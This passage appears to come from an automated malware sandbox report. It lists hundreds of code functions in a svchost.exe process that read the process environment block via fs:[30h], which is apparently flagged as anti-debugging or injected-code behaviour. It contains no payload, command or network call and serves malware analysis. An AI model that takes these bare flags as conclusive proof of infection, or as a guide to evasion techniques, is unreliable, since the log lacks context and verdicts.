            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]2_2_033601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6030 mov eax, dword ptr fs:[00000030h]2_2_033C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]2_2_0332A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]2_2_0332C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]2_2_033B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]2_2_0335C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]2_2_03332050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]2_2_033B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]2_2_033C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]2_2_0333208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]2_2_0332C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]2_2_033720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0332A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]2_2_033380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]2_2_033B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]2_2_033B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]2_2_033AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]2_2_03330710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]2_2_03360710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]2_2_0336C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]2_2_03338770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]2_2_03330750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE75D mov eax, dword ptr fs:[00000030h]2_2_033BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]2_2_033B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]2_2_033307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E47A0 mov eax, dword ptr fs:[00000030h]2_2_033E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D678E mov eax, dword ptr fs:[00000030h]2_2_033D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE7E1 mov eax, dword ptr fs:[00000030h]2_2_033BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]2_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]2_2_033B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]2_2_0334E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]2_2_03366620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]2_2_03368620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]2_2_0333262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]2_2_03372619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]2_2_033AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03362674 mov eax, dword ptr fs:[00000030h]2_2_03362674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334C640 mov eax, dword ptr fs:[00000030h]2_2_0334C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033666B0 mov eax, dword ptr fs:[00000030h]2_2_033666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C6A6 mov eax, dword ptr fs:[00000030h]2_2_0336C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov eax, dword ptr fs:[00000030h]2_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6500 mov eax, dword ptr fs:[00000030h]2_2_033C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E59C mov eax, dword ptr fs:[00000030h]2_2_0336E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov eax, dword ptr fs:[00000030h]2_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov ecx, dword ptr fs:[00000030h]2_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364588 mov eax, dword ptr fs:[00000030h]2_2_03364588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033325E0 mov eax, dword ptr fs:[00000030h]2_2_033325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033365D0 mov eax, dword ptr fs:[00000030h]2_2_033365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A430 mov eax, dword ptr fs:[00000030h]2_2_0336A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C427 mov eax, dword ptr fs:[00000030h]2_2_0332C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC460 mov ecx, dword ptr fs:[00000030h]2_2_033BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA456 mov eax, dword ptr fs:[00000030h]2_2_033EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332645D mov eax, dword ptr fs:[00000030h]2_2_0332645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335245A mov eax, dword ptr fs:[00000030h]2_2_0335245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033644B0 mov ecx, dword ptr fs:[00000030h]2_2_033644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BA4B0 mov eax, dword ptr fs:[00000030h]2_2_033BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033364AB mov eax, dword ptr fs:[00000030h]2_2_033364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA49A mov eax, dword ptr fs:[00000030h]2_2_033EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033304E5 mov ecx, dword ptr fs:[00000030h]2_2_033304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332CB7E mov eax, dword ptr fs:[00000030h]2_2_0332CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEB50 mov eax, dword ptr fs:[00000030h]2_2_033DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]2_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]2_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]2_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]2_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FAB40 mov eax, dword ptr fs:[00000030h]2_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D8B42 mov eax, dword ptr fs:[00000030h]2_2_033D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]2_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]2_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]2_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]2_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
